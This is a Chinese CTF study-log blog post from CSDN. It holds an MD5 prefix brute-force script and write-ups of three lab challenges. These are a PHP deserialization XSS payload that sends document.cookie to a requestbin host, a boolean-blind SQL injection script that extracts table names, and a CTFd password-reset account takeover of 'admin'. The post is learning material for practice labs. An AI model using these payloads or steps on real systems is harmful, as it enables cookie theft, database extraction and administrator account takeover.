学习记录--Day11 and Day12

最新推荐文章于 2024-04-11 20:27:02 发布
最新推荐文章于 2024-04-11 20:27:02 发布
阅读量509 收藏
点赞数
分类专栏: 日常学习小记 存在问题的学习记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/veinard_F/article/details/109109604
版权

记录一个求md5加密后前六位值确定的脚本

import hashlib

for i in range(1000000000):
    a = hashlib.md5(str(i).encode('utf-8')).hexdigest()

    if a[0:6] == '6d0bc1':
        print(i)
        print(a)

在这里插入图片描述

或者

import hashlib
a= "0123456789"
for o in a:
    for p in a:
        for q in a:
            for r in a:
                for s in a:
                    for t in a:
                        for u in a:
                            b = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u)
                            md5 = hashlib.md5(b.encode('utf-8')).hexdigest()
                            if ((md5[0:6])=='6d0bc1'):
                                print (b)

ssi注入漏洞(服务端包含漏洞):
参考

题目:[BJDCTF 2nd]xss之光
.git文件泄露,GitHack获取源码:

<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);

利用php的原生类进行xss payload,用的是Exception反序列化

<?php
$a = new Exception("<script>window.location.href=\"http://http.requestbin.buuoj.cn/1nrks0e1?cookie=\"+escape(document[\"cookie\"])</script>");
echo $b = urlencode(serialize($a));

payload:
?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A115%3A%22%3Cscript%3Ewindow.location.href%3D%22http%3A%2F%2Fhttp.requestbin.buuoj.cn%2F1nrks0e1%3Fcookie%3D%22%2Bescape%28document%5B%22cookie%22%5D%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A52%3A%22C
抓包后,在cookie中得到flag,而且此时是已经Unicode过的,需要解一下。

题目二:[WUSTCTF2020]颜值成绩查询
经过几次测试可以发现是布尔盲注,可以用1^0,
if(length(database())>1,1,0)测试
之前做过涉及到二分法的题,
exp:

import requests

url = "http://ebf95ad7-9c24-4771-8d98-b0b14cb1b310.node3.buuoj.cn/?stunum="

result = ""
i = 0

while (True):
    i = i + 1
    head = 32
    tail = 127

    while (head < tail):
        mid = (head + tail) >> 1

        # payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
        payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (
        i, mid)

        r = requests.get(url + payload)
        r.encoding = "utf-8"
        # print(url+payload)
        if "your score is: 100" in r.text:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid

    last = result

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

运行爆出来的表名很奇怪,也不知道是为什么。。。
就先这样吧,主要是学习一下这个脚本怎么写。。。
题目三:[V&N2020 公开赛]HappyCTFd
漏洞参考文章.

漏洞利用方式:
首先注册一个用户名包含空格,默认的管理员是admin,那么就可以注册一个 admin。

然后,退出登录,点重置密码。

这时候邮箱里就会收到一个url,这个url后面拼接的token实际上是属于用户名admin的

将自己注册的账号用户名修改成其他

然后点开链接修改密码,admin的密码就被修改了
(就按照上面的步骤解题就可以了)
由于访问页面后来一直返回503报错,复现有一些困难。。。

最近做的题要么就是完全看不懂,要么就是题目环境问题,要么就是照着wp一步步做都出不来,我吐了。。。
不过上面的题目和知识点中还有很多需要补充的地方。

piubiutiu~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
Mentor-dft 学习笔记 day1--overview部分
qq_42327670的博客
09-27 1904
Mentor-dft 学习笔记 day1--overview部分
dayand-night-tower-siege
04-10
《愤怒的小鸟:昼夜塔防》(Angry Birds Stage 4)是一款深受玩家喜爱的基于...在"day-and-night-tower-siege-main"中,我们可以深入学习到JavaScript在游戏开发中的应用,以及如何构建一个完整的2D游戏框架。
哈希函数md5().hexdigest()
热门推荐
西门大盗 捉虫专家
06-16 3万+
将文件保存时,通过哈希函数对每个文件进行文件名的自动生成。 import os from hashlib import md5 def save_image(content): file_path = '{0}/{1}.{2}'.format(os.getcwd(), md5(content).hexdigest(), 'jpg')#保存到当前路径,文件名自动哈希生成 print(fil...
ogre-next 学习笔记 - Day 7
weixin_43859510的博客
01-06 2362
ogre-next 学习笔记 - Day 7
机器学习和深度学习--李宏毅(笔记与个人理解)Day11-12
weixin_65403042的博客
04-11 2144
换句话说,如果我们发现了一个负特征值λ 和相应的特征向量u,我们可以通过沿着 u 的方向更新 θ 来降低损失函数的值。引入高维空间的观点,解决local minima的问题:我们很少遇到local minima;例如,如果你有100个batch,那么在完成一个epoch后,每个参数会被更新100次。知道学到这里想到什么嘛……和对应的特征值 λ定义为满足下列关系的向量和标量:Hu=λu。这里举了两个极端的例子,也是我们常见的学习方法:取极限看效果。有没有感觉这种思想还挺常见的,用来做局部最小值的优化的。
itheima苍穹外卖项目学习笔记--Day4: 套餐管理 / Day5: 店铺营业状态设置
weixin_46926189的博客
07-14 3472
在SetmealMapper中实现pagequery方法,动态SQL语句将写在xml文件中。在SetmealServiceImpl中,实现套餐起售、停售方法,及其父类接口。在SetmealServiceImpl中,实现新增套餐的方法,及其父类接口。SetmealServiceImpl中,实现批量删除套餐方法,及其父类接口。SetmealServiceImpl中,实现根据id查询套餐,及其父类接口。SetmealServiceImpl中,实现修改套餐方法,及其父类接口。
Python笔记--day11
道南的博客
04-05 806
Python笔记--day11
【关于nginx升级---存在0day漏洞】
✨ 欢迎来到【Seal ^_^ 的CSDN博客】!这里是我记录技术心得、分享经验的地方。✨
11-10 1万+
0day漏洞——又称“零日漏洞”(zero-day),是漏洞已经被发现(有可能未被公开),但是官方还没有发布相关补丁的漏洞。
瑞吉外卖-全网最全笔记-Day05
eadzsdad的博客
04-24 6171
黑马教程-瑞吉外卖,基于流行的Spring Boot、mybatis plus等技术框架进行开发,带领学员体验真实项目开发流程、需求分析过程和代码实现过程。能够收获:锻炼需求分析能力、编码能力、bug调试能力,增长开发经验。阿里云验证码测试。
学习笔记 Day 31(MySql -- 2)
a_Loki的博客
01-23 566
and和or的: 当优先级不确定时,加小括号: in: 和or一样,where in asl(1000,5000) 模糊排序: 数据排序:
python3.7 机器学习-Day1
Yuan_mingyu的博客
02-14 3415
代码来源 (https://github.com/MLEveryday/100-Days-Of-ML-Code.git) 说明:文章中的python代码大部分来自于github(少数是学习时测试添加),所附笔记为学习时注。 Day1 学习笔记(含测试部分) #Day1:Data Prepocessing #2019.1.26-27,2019.2.9 #coding=utf-8 import wa...
ajax-day01.rar_达内开发学习笔记
09-20
在“ajax-day01.rar_达内开发学习笔记”这个压缩包中,包含了第一天学习Ajax的基础内容,旨在帮助初学者理解并掌握Ajax的核心概念和使用方法。** **一、Ajax简介** Ajax并不是一种单一的技术,而是一组技术的组合,...
算法学习笔记—-Day31(pandas中时间序列、数据可视化)
12-22
目录第一部分:pandas时间序列一.python中的时间日期二.pandas中的时间日期三.时间重采样(resample)四.文件中读取日期序列第二部分:pandas数据可视化一.线形图二.柱状图(bar)三.直方图(histogram)四....
崔希凡javaweb笔记day08-day13
11-09
崔希凡老师的javaweb笔记涵盖了从day08到day13的重要学习内容,这是传智播客官网上一套详尽的视频教程的配套资料。这些笔记和源码旨在帮助学员深入理解JavaWeb开发的核心技术,提升编程技能。以下是根据这些天的笔记...
AIDTN2202-Day01笔记.pdf
02-24
通过上述内容,我们可以了解到在AIDTN2202-Day01的学习中,主要涉及了Python的基础知识,包括Python的定义、交互环境的使用、基本操作、变量、数据类型、运算符、类型转换、条件语句等内容。这些知识点是学习Python...
基于springcloud微服务开发平台
最新发布
07-22
采用前后端分离的模式,前端开源两个框架:Sword (基于 React、Ant Design)、Saber (基于 Vue、Element-UI) 后端采用SpringCloud全家桶,并同时对其基础组件做了高度的封装,单独开源出一个框架:BladeTool BladeTool已推送至Maven中央库,直接引入即可,减少了工程的臃肿,也可更注重于业务开发 集成Sentinel从流量控制、熔断降级、系统负载等多个维度保护服务的稳定性。 注册中心、配置中心选型Nacos,为工程瘦身的同时加强各模块之间的联动。 极简封装了多租户底层,用更少的代码换来拓展性更强的SaaS多租户系统。 借鉴OAuth2,自研多终端认证系统,可控制子系统的token权限互相隔离。 借鉴Security,自研Secure模块,采用JWT做Token认证,可拓展集成Redis等细颗粒度控制方案。 稳定生产了六年,经历了从 Camden -> Hoxton -> 2023 的技术架构,也经历了从fat jar -> docker -> k8s + jenkins的部署架构。 项目分包明确,规范微服务的开发模式,使包与包
毕业设计javajsp诗歌诗词网站sqlserver-qr源码含文档工具包
07-22
毕业设计javajsp诗歌诗词网站sqlserver-qr源码含文档工具包 页面是jsp,数据库sqlserver,jdk1.8,开发工具用ecplise、myecplise、sts、idea都可以 诗韵人间网站 系统管理 修改密码 年代管理 年代录入 诗词管理 诗词录入 诗词搜索 留言板 包含:源码、数据库脚本、论文、答辩ppt、开题报告、环境工具包、相同框架项目的安装教程(在说明文档中)
【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码)
07-22
【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正在做毕设的学生和需要项目实战练习的学习者,也可作为课程设计、期末大作业。 包含全部项目源码、该项目可以直接作为毕设使用。项目都经过严格调试,确保可以运行! 【Java 毕业设计】基于Java题库及试卷管理模块的设计与开发代码(完整源码) 【优秀毕业设计】主要针对计算机相关专业的正
凯度:2022凯度银行保险行业品牌建设报告:以差异化博弈变局,洞察银行保险业的品牌增长之道(1).pdf
07-22
凯度:2022凯度银行保险行业品牌建设报告:以差异化博弈变局,洞察银行保险业的品牌增长之道(1).pdf
SELECT DATE('2023-05-18') AS date, COUNT(*) AS count FROM worker_visit_record WHERE '2023-05-18' >= DATE( NOW()) - INTERVAL 1 DAYAND '2023-05-18' < DATE( NOW()) + INTERVAL 1 DAYGROUP BY DATE( '2023-05-18' );报错
05-30
根据你提供的 SQL 语句,我看到其中存在两个问题: 1. 在 `GROUP BY` 子句中,你... AND worker_visit_record.date ('2023-05-18') + INTERVAL 1 DAY GROUP BY DATE(worker_visit_record.date); ``` 希望能够帮到你!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值